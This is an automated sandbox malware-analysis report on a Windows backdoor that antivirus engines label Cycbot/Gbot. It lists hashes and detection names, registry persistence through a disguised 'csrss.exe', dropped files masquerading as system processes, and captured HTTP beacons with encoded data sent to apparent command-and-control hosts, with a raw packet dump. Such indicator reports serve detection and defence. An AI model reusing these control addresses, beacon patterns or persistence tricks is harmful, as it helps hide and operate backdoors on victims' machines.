Analysis Date2014-08-17 18:08:52
MD5df539170709b3d68a0027855d28130b6
SHA1d4b99753acdffdd452a296a05ad64bb233388f25

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: e20f005f6bbc73f17d1d064aac567a06 sha1: b6cbc667069492f369d05f9e3424f69e4dd4611a size: 121344
Section.rdata md5: f32dd41836e1a6533462afdb9d12465d sha1: 1d694979cf292d2f16eec3b11149da8ded343009 size: 1024
Section.data md5: 48cc4c2d2ab73dd03e5ec75ba50ce3ce sha1: e6046ff96a5e87fb312ec519d74041237d0e96fa size: 56832
Section.apexi md5: 763766d07bfe1d66ec03f6957926ece9 sha1: 72dbc34a0d2b5e2ba075dddbbea4ab3072dffdb4 size: 1024
Timestamp2005-09-26 09:41:37
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1556
PEhash29bc0868e7dde04c3fd5984850d0c426daaf4cc7
IMPhash2df3277c70999b6405861449672ea9ba
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-658
AVDr. WebBackDoor.Gbot.31
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.MIA
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Win32/Heri
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!Trojan.Kryptik.Win32.149546

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSgravatar.com
Winsock DNSextremerollerclub.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.240
DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSextremerollerclub.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v55=92&tq=gKZEtzymKyxELk6C9E7mmOGAfMW4GyaJyGROsEX9cA%2FxBNhsle1cRrhd9WQAKPEKz1tAB96i%2FYv2uQ4G6z9ss02NgOBk6qxBVDqR8IrfdCqb62mbiN5fgysZy8Qs8NK1%2B6vIEsR8cFYpNHUwGyR8VtsIZnmh6%2B3uXgltAwU%2FmrgnQLpPPruLztei%2FZqLbGf0J%2BzJaddyi6qdpKO%2FjA4Vj5pwLYFwHtrQ7cCi57Uc47gUBLqIs5WhLb15ltfam7CJUC5DFShGP2oTBXmzQex4UZrF1gfQg4Mn%2B3Bxmpq3RzqiP2qG52wgn
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 192.0.80.240:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626531 3f763535   bcfe64067be1?v55
0x00000040 (00064)   3d393226 74713d67 4b5a4574 7a796d4b   =92&tq=gKZEtzymK
0x00000050 (00080)   7978454c 6b364339 45376d6d 4f474166   yxELk6C9E7mmOGAf
0x00000060 (00096)   4d573447 79614a79 47524f73 45583963   MW4GyaJyGROsEX9c
0x00000070 (00112)   41253246 78424e68 736c6531 63527268   A%2FxBNhsle1cRrh
0x00000080 (00128)   64395751 414b5045 4b7a3174 41423936   d9WQAKPEKz1tAB96
0x00000090 (00144)   69253246 59763275 51344736 7a397373   i%2FYv2uQ4G6z9ss
0x000000a0 (00160)   30324e67 4f426b36 71784256 44715238   02NgOBk6qxBVDqR8
0x000000b0 (00176)   49726664 43716236 326d6269 4e356667   IrfdCqb62mbiN5fg
0x000000c0 (00192)   79735a79 38517338 4e4b3125 32423676   ysZy8Qs8NK1%2B6v
0x000000d0 (00208)   49457352 38634659 704e4855 77477952   IEsR8cFYpNHUwGyR
0x000000e0 (00224)   38567473 495a6e6d 68362532 42337558   8VtsIZnmh6%2B3uX
0x000000f0 (00240)   676c7441 77552532 466d7267 6e514c70   gltAwU%2FmrgnQLp
0x00000100 (00256)   50507275 4c7a7465 69253246 5a714c62   PPruLztei%2FZqLb
0x00000110 (00272)   4766304a 2532427a 4a616464 79693671   Gf0J%2BzJaddyi6q
0x00000120 (00288)   64704b4f 2532466a 4134566a 3570774c   dpKO%2FjA4Vj5pwL
0x00000130 (00304)   59467748 74725137 63436935 37556334   YFwHtrQ7cCi57Uc4
0x00000140 (00320)   37675542 4c714973 3557684c 6231356c   7gUBLqIs5WhLb15l
0x00000150 (00336)   7466616d 37434a55 43354446 53684750   tfam7CJUC5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a354446 53684750   close....5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a354446 53684750   ose......5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
...&.M.
...
...q[..;..........8..^..&.eU..SK..
K
m.
0h
..C.
..%..e.
..
.
M.j
..O...
<.#.
...o
..^.M5<
^l../
...`
.1n..sQ
..
.
..O
b
cl
.^
040904b0
0!P!@
1.0.0.3
1556
@!cb
DpV`
FileVersion
jjjjjj
PrivateBuild
ProductVersion
@raA
RbqB
sT@!
StringFileInfo
TIMES NEW ROMAN
Translation
! `U
VarFileInfo
VS_VERSION_INFO
0x\vaT
1h$~wf
>1=M']
1!!Z]L
29CB}+M
2c.4:4
^#@2Kq
4a*s|-
4;RFXiF4
~5*`/[
_?5=zU
=$6h@yF1,<
|;7v5a
8b@gyz
|/8le#jrq
$8Xe<|
8>xqTf
+8,X}Zgm
9*5u*^1
9#sDlcP
9zyt)4?
a6;m>S
abM!-sA
A?nYtv
.apexi
b75</4
BjT<Ug
b;m+	>
B/:	=X
CheckRemoteDebuggerPresent
CHyAN}%
>cq?tu'
CreateWindowExW
Ctkm(s
cwld{Xn
{d,	&A
@.data
dc<(%zj
dg#-X;
;dndxb
dYXduC
e&[%4m
E!9<UF
$eiKlg
EndDialog
EnumResourceTypesW
e$oDa:
FqXRT.
f-r#nr
Fy*:Lw
*=g5-m|
gCsfzx
/^!GdE]
GetFileType
GetParent
GetStartupInfoA
GetWindowInfo
gg%3-W
g[LM%/
HeapCreate
.!h{,M\
hR(2-T
IC3tTR
I=c=fV
IlFt(L
InitializeCriticalSection
+.ize 
Jid^nV
j_(kn4
,'J~|N
-j[o62
$$}j	sr
Jtnc~;
*J:t	tg
-JYmy=
KERNEL32.dll
Kf8O~+A
Kfr{@'B
{kH9N,
(k"hb;|
/ki?v.
L$GbKE
lMJ@/y
LoadCursorW
LresultFromObject
lstrcpynW
m0KPq7E4
MessageBoxW
mL9|sy
`moHb5,M
/mPA yN
mR1yj2K^^W
$mu-qm
n#FM!n
&;nKth*
<NT>d4x
|n<VBI
NXKo6%
Ogd$3O
O%KQZH
OLEACC.dll
OLo382
Olq<-Xw
O[\%OYE
oV$>S741E
}P2j\#
Q6yPKp
*qfj;D
<]^]QH
r9DW*X0
r9olF}
`.rdata
RegisterClassExW
r N,rU
$S Jzn
,S{M~R
	SP)	hRrqt
*SXkQY
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
T]n/u^
<t%(t:y6
TU1c&,p
U<b6T_
ug9 _RC
uH]4!'
;->uJHp
U}n#"Z
USER32.dll
*V>0q*
v1.3r'
vdl*NNK
v*Z6XL
-<>W{@
wJzIJ\
,}w*mc
[WZ5U2
>'yD$$6
\yD	VT
Yhil+R
y'ik0a
]yNZ@y1
yR%t\`
Yv,Wkbyu@3
z3Da>L;c
Z3EQZQho
zB*h](G
z MuP 
Zowl}0